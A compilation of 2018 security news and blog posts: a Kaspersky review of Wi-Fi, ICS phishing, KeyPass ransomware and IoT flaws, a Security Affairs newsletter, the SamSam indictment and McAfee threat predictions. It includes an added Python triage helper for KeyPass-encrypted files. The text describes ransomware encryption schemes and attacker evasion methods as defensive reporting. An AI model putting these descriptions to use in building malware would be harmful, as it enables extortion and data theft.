In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.
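A triage helper, added here as an example and not part of Kaspersky's report, that applies the scheme described above from the responder's side: it finds KeyPass ransom notes and renamed files in a directory tree, checks that the head of each file really looks like ciphertext, and carves out the untouched plaintext that sits past the 0x500000 boundary. The sample directory tree, the file names other than the ones the report gives, and the random bytes standing in for the encrypted region are constructed for the example.

```python
"""KeyPass incident triage, an added example (not Kaspersky's tooling).
It uses only the facts in the summary above: encrypted files gain the extra
extension 'KEYPASS', every affected directory gets a ransom note named
'!!!KEYPASS_DECRYPTION_INFO!!!.txt', and only the first 0x500000 bytes of
a file are encrypted, so anything past that offset is still plaintext.
The sample directory tree is constructed here; os.urandom stands in for
the encrypted region because its byte distribution resembles AES output."""
import math
import os
import tempfile
from dataclasses import dataclass
from pathlib import Path

RANSOM_NOTE = "!!!KEYPASS_DECRYPTION_INFO!!!.txt"
ENCRYPTED_SUFFIX = ".KEYPASS"
ENCRYPTED_PREFIX_LEN = 0x500000   # ~5 MB, as described above
SAMPLE_LEN = 64 * 1024            # bytes of the file head we measure
SAMPLE_TAIL = b"intact tail: quarterly totals\n" * 100  # constructed data


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ciphertext approaches 8.0, documents sit well below."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


@dataclass
class EncryptedFile:
    path: Path
    original_name: str       # name before '.KEYPASS' was appended
    size: int
    head_len: int
    head_entropy: float
    intact_tail_bytes: int   # plaintext bytes beyond the 0x500000 boundary

    @property
    def likely_encrypted(self) -> bool:
        # Scale the threshold for small files, whose entropy cannot reach 8.0.
        if self.head_len == 0:
            return False
        return self.head_entropy >= 0.9 * min(8.0, math.log2(self.head_len))


def inspect_encrypted_file(path: Path) -> EncryptedFile:
    size = path.stat().st_size
    with path.open("rb") as f:
        head = f.read(min(SAMPLE_LEN, size))
    return EncryptedFile(
        path=path,
        original_name=path.name[: -len(ENCRYPTED_SUFFIX)],
        size=size,
        head_len=len(head),
        head_entropy=shannon_entropy(head),
        intact_tail_bytes=max(0, size - ENCRYPTED_PREFIX_LEN),
    )


def recover_tail(path: Path) -> bytes:
    """Bytes KeyPass never touched (offset >= 0x500000); empty for small files."""
    with path.open("rb") as f:
        f.seek(ENCRYPTED_PREFIX_LEN)
        return f.read()


def triage(root: Path) -> dict:
    """Walk a tree and collect ransom notes plus per-file recovery facts."""
    notes, files = [], []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = Path(dirpath) / name
            if name == RANSOM_NOTE:
                notes.append(p)
            elif name.endswith(ENCRYPTED_SUFFIX):
                files.append(inspect_encrypted_file(p))
    return {"notes": notes, "files": files}


def build_sample_tree() -> Path:
    """Constructed fixture: one affected directory as KeyPass would leave it."""
    root = Path(tempfile.mkdtemp(prefix="keypass_triage_"))
    docs = root / "docs"
    docs.mkdir()
    (docs / RANSOM_NOTE).write_text("constructed stand-in for the ransom note\n")
    # Large file: 0x500000 bytes of 'ciphertext' followed by the untouched tail.
    (docs / ("report.docx" + ENCRYPTED_SUFFIX)).write_bytes(
        os.urandom(ENCRYPTED_PREFIX_LEN) + SAMPLE_TAIL)
    # Small file: fully encrypted, nothing left to carve out.
    (docs / ("notes.txt" + ENCRYPTED_SUFFIX)).write_bytes(os.urandom(3000))
    (docs / "readme.txt").write_text("untouched file, no KEYPASS suffix\n")
    return root


if __name__ == "__main__":
    result = triage(build_sample_tree())
    print(f"ransom notes: {len(result['notes'])}")
    for ef in result["files"]:
        print(f"{ef.original_name}: {ef.size} bytes, entropy {ef.head_entropy:.2f}, "
              f"encrypted={ef.likely_encrypted}, recoverable tail={ef.intact_tail_bytes}")
```

The entropy check separates files that were actually encrypted from files merely renamed, and the tail recovery is what makes large files such as databases or VM images partially salvageable even when the key is unknown.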

However, it’s not only new ransomware families that are causing problems. One and a half years after the WannaCry epidemic, it continues to top the list of the most widespread cryptor families – so far, we have seen 74,621 unique attacks worldwide. These attacks accounted for 28.72% of all those targeted with cryptors in Q3 2018. This percentage has risen by two-thirds during the last year. This is especially alarming considering that a patch for the EternalBlue exploit used by WannaCry existed even before the initial epidemic in May 2017.

Asacub and banking Trojans

2018 showed the most impressive figures in terms of the number of attacks involving mobile banking Trojans. At the beginning of the year, this type of threat seemed to have leveled off both in number of unique samples detected and number of users attacked.

However, in the second quarter there was a dramatic change for the worse: record-breaking numbers of detected mobile banking Trojans and attacked users. The root cause of this significant upturn is unclear, though the main culprits were the creators of Asacub and Hqwar. An interesting feature of Asacub is its longevity: according to our data, the group behind it has been operating for more than three years.

Asacub evolved from an SMS Trojan, which from the very outset possessed techniques for preventing deletion and intercepting incoming calls and SMSs. The creators subsequently complicated the program logic and started the mass distribution of the malware. The chosen vector was the same as that at the very beginning – social engineering via SMS. However, this time the valid phone numbers were sourced from popular bulletin boards, with owners often expecting messages from unfamiliar subscribers.

The propagation technique then snowballed when the devices that the Trojan had infected started spreading the infection – Asacub self-proliferated to the victim’s entire contact list.

Smart doesn’t mean secure

These days we’re surrounded by smart devices. This includes everyday household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. We’re even seeing the emergence of smart cities. However, this offers a greater attack surface to anyone looking to take advantage of security weaknesses – for whatever purpose. Securing traditional computers is difficult. But things are more problematic with the internet of things (IoT), where the lack of standardization leaves developers free to ignore security, or to treat it as an afterthought. There are plenty of examples to illustrate this.

In February, we explored the possibility that a smart hub might be vulnerable to attack. A smart hub lets you control the operation of other smart devices in the home, receiving information and issuing commands. Smart hubs might be controlled through a touch screen, or through a mobile app or web interface. If it’s vulnerable, it would potentially provide a single point of failure. While the smart hub our researchers investigated didn’t contain significant vulnerabilities, there were logical mistakes that were enough to allow our researchers to obtain remote access.

Researchers at Kaspersky Lab ICS CERT checked a popular smart camera to see how well protected it is from hackers. Smart cameras are now part of everyday life. Many now connect to the cloud, allowing someone to monitor what’s happening at a remote location – to check on pets, for security surveillance, etc. The model our researchers investigated is marketed as an all-purpose tool – suitable for use as a baby monitor, or as part of a security system. The camera is able to see in the dark, follow a moving object, stream footage to a smartphone or tablet and play back sound through a built-in speaker. Unfortunately, the camera turned out to have 13 vulnerabilities – almost as many as it has features – that could allow an attacker to change the administrator password, execute arbitrary code on the device, build a botnet of compromised cameras or stop it functioning completely.

Potential problems are not limited to consumer devices. Early this year, Ido Naor, a researcher from our Global Research and Analysis Team and Amihai Neiderman from Azimuth Security, discovered a vulnerability in an automation device for a gas station. This device was directly connected to the internet and was responsible for managing every component of the station, including fuel dispensers and payment terminals. Even more alarming, the web interface for the device was accessible with default credentials. Further investigation revealed that it was possible to shut down all fueling systems, cause a fuel leakage, change the price, circumvent the payment terminal (in order to steal money), capture vehicle license plates and driver identities, execute code on the controller unit and even move freely across the gas station network.

Technology is driving improvements in healthcare. It has the power to transform the quality and reduce the cost of health and care services. It can also give patients and citizens more control over their care, empower carers and support the development of new medicines and treatments. However, new healthcare technologies and mobile working practices are producing more data than ever before, at the same time providing more opportunities for data to be lost or stolen. We’ve highlighted the issues several times over the last few years (you can read about it here, here and here). We continue to track the activities of cybercriminals, looking at how they penetrate medical networks, how they find data on publicly available medical resources and how they exfiltrate it. In September, we examined healthcare security. More than 60% of medical organizations had some kind of malware on their computers. In addition, attacks continue to grow in the pharmaceutical industry. It’s vital that medical facilities remove all nodes that process personal medical data, update software and remove applications that are no longer needed, and do not connect expensive medical equipment to the main LAN. You can find our detailed advice here.

This year, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities. Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies the certificate of its server, without relying solely on the system. As a result, the other apps are vulnerable to man-in-the-middle (MitM) attacks: intruders can intercept transmitted data by ‘persuading’ victims to install their certificate.

Some of our researchers also looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data. Not only was it possible to work out that the wearer is sitting or walking, but also figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to recover a computer password with 96 per cent accuracy and a PIN code entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information. In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, it raises the question of security – how safe is the personal information of people using the services? In July, we tested 13 apps, to see if their developers have considered security. The results of our tests were not encouraging. It’s clear that app developers don’t fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analyzed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not just very similar to each other but are actually based on the same code. You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. Yet manufacturers still don’t prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions. And the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning. Malware for smart devices is increasing not only in quantity, but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine crypto-currency. In September, we published a report on IoT threats, and this year we have started to include data on IoT attacks in our quarterly and end-of-year statistics reports.

It’s vital that vendors improve their security approach, ensuring that security is considered when products are being designed. Governments in some countries, in an effort to encourage security by design in manufacturers of smart devices, are introducing guidelines. In October, the UK government launched its code of practice for consumer IoT security. The German government recently published its suggestions for minimum standards for broadband routers.

It’s also important that consumers consider security before buying any connected device.

  • Consider if you really need the device. If you do, check the functions available and disable any that you don’t need to reduce your attack surface.
  • Look online for information about any vulnerabilities that have been reported.
  • Check to see if it’s possible to update the firmware on the device.
  • Always change the default password and replace it with a unique, complex password.
  • Don’t share serial numbers, IP addresses and other sensitive data relating to the device online.

Our data in their hands

Personal information is a valuable commodity. This is evident from the steady stream of data breaches reported in the news – these include Under Armour, FIFA, Adidas, Ticketmaster, T-Mobile, Reddit, British Airways and Cathay Pacific.

The scandal involving the use, by Cambridge Analytica, of Facebook data is a reminder that personal information is not just valuable to cybercriminals. In many cases, personal data is the price people pay to obtain a product or service – ‘free’ browsers, ‘free’ email accounts, ‘free’ social network accounts, etc. But not always. Increasingly, we’re surrounded by smart devices that are capable of gathering details on the minutiae of our lives. Earlier this year, one journalist turned her apartment into a smart home in order to measure how much data was being collected by the firms that made the devices. Since we generally pay for such devices, the harvesting of data can hardly be seen as the price we pay for the benefits they bring in these cases.

Some data breaches have resulted in fines for the companies affected (the UK Information Commissioner’s Office fined Equifax and Facebook, for example). However, so far fines levied have been for breaches that occurred before the EU General Data Protection Regulation (GDPR) came into force in May. The penalties for any serious breaches that occur in the future are likely to be much higher.

There’s no such thing as 100% security, of course. But any organization that holds personal data has a duty of care to secure it effectively. And where a breach results in the theft of personal information, companies should alert their customers in a timely manner, enabling them to take steps to limit the potential damage that can occur.

While there’s nothing that we, as individuals, can do to prevent the theft of our personal information from an online provider, it’s important that we take steps to secure our online accounts and to minimize the impact of any breach – in particular, by using unique passwords for each site, and by using two-factor authentication.

Security Affairs: Security Affairs newsletter Round 191 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Very trivial Spotify phishing campaign uncovered by experts
·      Experts found a new powerful modular Linux cryptominer
·      Hacker stole $1m from Silicon Valley executive via SIM swap
·      Linux Kernel is affected by two DoS vulnerabilities still unpatched
·      Ransomware attack disrupted emergency rooms at Ohio Hospital System
·      When Do You Need to Report a Data Breach?
·      Experts demonstrate how to exfiltrate data using smart bulbs
·      Malicious developer distributed tainted version of Event-Stream NodeJS Module to steal Bitcoins
·      The SLoad Powershell malspam is expanding to Italy
·      UK Parliament seized confidential Facebook docs to investigate its data protection policies.
·      British MP: Facebook was aware about Russian activity at least since 2014
·      FBI along with security firms dismantled 3ve Ad Fraud Operation
·      Initial patch for Webex Meetings flaw WebExec was incomplete. Cisco fixed it again
·      Uber fined nearly $1.2 Million by Dutch and UK Data Protection Authorities over data breach
·      AccuDoc Data Breach impacted 2.6 Million Atrium Health patients
·      Dell data breach – Dell forces password reset after the incident
·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework


Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.


First Smartphone: Are You Putting Cyberbullies Under the Tree This Year?

There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter ready? Bigger question: Are you ready?

A first smartphone is a big step in a family that can’t be unstepped. Because it’s not about what a phone used to be about, which is dialing the number of a person you need to speak with. Today, giving your child a cell phone unlocks a hidden wardrobe door that leads to a whole new Narnia-like world abounding in both hills of goodness and valleys of emotional punches.

A first cell phone isn’t a casual purchase. Besides the financial investment (these things aren’t cheap), there’s a family dynamic that will likely change and a peer-to-peer dynamic that will go through its tumultuous metamorphosis.

Here are a few things to consider and talk through with your family before making your final decision to purchase that first smartphone.

Family talking points

  1. Maturity milestones. A phone is a small computer your child will carry in his or her pocket from this point forward. Has your child demonstrated maturity in other areas? Can he or she stay home alone responsibly for short periods? Does your child take care of his or her possessions, complete chores, and homework on time and without you nagging? Does your child earn/save/spend his or her allowance in a mature way? Does your child show empathy for others or deal with conflict well? These milestones are worth examining. If you feel uneasy about your child’s overall maturity, you might consider setting some goals to move your child toward cell phone ownership sometime in the future.
  2. The cyberbully factor. We know you’d never willingly invite a cyberbully into your home and especially wouldn’t put one under the tree for your child to discover on Christmas morning. However, that’s the reality of what phone ownership will bring sooner or later. Is your child emotionally strong enough to handle mean comments, feeling excluded, or being criticized or joked with in public? How does your child handle peer conflict without a phone? The emotional impact of owning a phone is not something you will see advertised, but it’s a huge factor to consider.
  3. Peer pressure. Digital peer pressure is a real thing. There’s pressure to dress a certain way, post pictures a certain way, and post activities online to gain status points in certain social circles. The selfie craze, online dares, digital trends and hashtags, and other pressures are all part of the smartphone equation.
  4. Harmful content. There’s a lot of great content online — educational, entertaining, and fun — but there’s a lot of content that is harmful to kids such as pornography, hateful ideology, and cruelty. Can your child resist the temptation to seek out or look at concerning content? Can your child discern ideas? Are you as a parent willing to take the extra steps to filter inappropriate content?
  5. Privacy issues. With a new phone comes great responsibility toward guarding one’s personal information. Do you have the time to communicate, teach, and monitor your child’s online footprint? Getting kids off to a strong start will require much time and care up front until your son or daughter has a grasp on the value of personal data.
  6. Social media. Social media owns vast real estate on a child’s phone and includes everything from gaming, to social networks, to various “communities” attached to apps. Anywhere your child can create a username and profile and connect with others opens him or her up to risks of cyberbullying, strangers, and scams. Discuss new apps and establish ground rules and phone usage boundaries that make sense for your family. The most important part of setting rules is to enforce the rules.
  7. Screentime ground rules. With a first smartphone comes the risk of too much screen time. Addiction to online gaming, social media, and phones in general has become a public health concern. Put family rules in place that set time limits and phone-free zones. Keep communication open and consistent to keep your kids following healthy screen time habits.


The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

Brazilian Financial Malware Spreads Beyond National Boundaries

Brazilian Actors Expand Financial Malware Campaigns to Attack Spanish-Speaking Countries

A detailed analysis from security researchers shows how Brazilian financial malware is spreading beyond national boundaries to attack banks in Spanish-speaking countries through South and Latin America, and Portugal and Spain in Europe. 

U.S. DoJ charges Iranian duo over SamSam Ransomware activity

The U.S. DoJ charges two Iranian men over their alleged role in creating and spreading the infamous SamSam ransomware.

Two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), have been charged by the DoJ for their role in creating and distributing the dreaded SamSam ransomware.

The duo faces six hacking and extortion-related charges, including conspiracy to commit wire fraud, intentional damage to a protected computer, conspiracy to commit fraud and related activity in connection with computers, and transmitting a demand in relation to damaging a protected computer.

The two Iranians are accused of having developed the SamSam ransomware in December 2015 and of having continuously improved it since.

“Extorted the Victims for ransom payments in exchange for the decryption keys to unlock the compromised computers.” reads the DoJ indictment.

“The defendants hacked, encrypted, and extorted more than 200 Victims, and collected more than $6 million in ransom payments. The Victims incurred additional losses exceeding $30 million resulting from the loss of access to their data.”

The hackers extorted over 200 organizations, including public institutions, municipalities and hospitals, causing over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by the ransomware; the cyber attack was confirmed by city officials.

The ransomware infection interrupted several of the city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the Port of San Diego in September; the incident affected the processing of park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT), which shut down the infected workstations.

In August, the security firm Sophos published a report on the SamSam ransomware; its experts tracked Bitcoin addresses managed by the crime gang and discovered that the crooks had extorted nearly $6 million from victims since December 2015, when the ransomware first appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015. 74% of the known victims are based in the United States. Other regions known to have suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid a total of $5.9 million; the security firm also estimated that the group is netting around $300,000 per month.

Prosecutors reported that Savandi and Mansouri used Iranian Bitcoin exchanges to exchange the cryptocurrency into Iranian rial.

The crooks used the Tor network to avoid being tracked; experts noticed that they also encrypted data backups to prevent victims from recovering their encrypted files.

Authorities added the two Iranians to the FBI’s Cyber Most Wanted list.

Pierluigi Paganini

(Security Affairs – SamSam ransomware, Iranian hackers)

The post U.S. DoJ charges Iranian duo over SamSam Ransomware activity appeared first on Security Affairs.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants show that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani


Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, the vulnerable remote desktop protocol (RDP) offers another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP, attack it with ransomware, and propagate through networks either living off the land or using worm functionality (EternalBlue). There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the length of a vulnerability’s life, from detection to weaponization, will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit cards details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as “process doppelgänging” with the SynAck ransomware, and PROPagate injection delivered by the Rig Exploit Kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. One example is WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembling techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDOS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered the first UEFI rootkit, LoJax. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to avoid investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used InnoSetup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, or to check infected environments before deploying later stages and avoiding detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaceted, or synergistic, threats.

What could be worse?

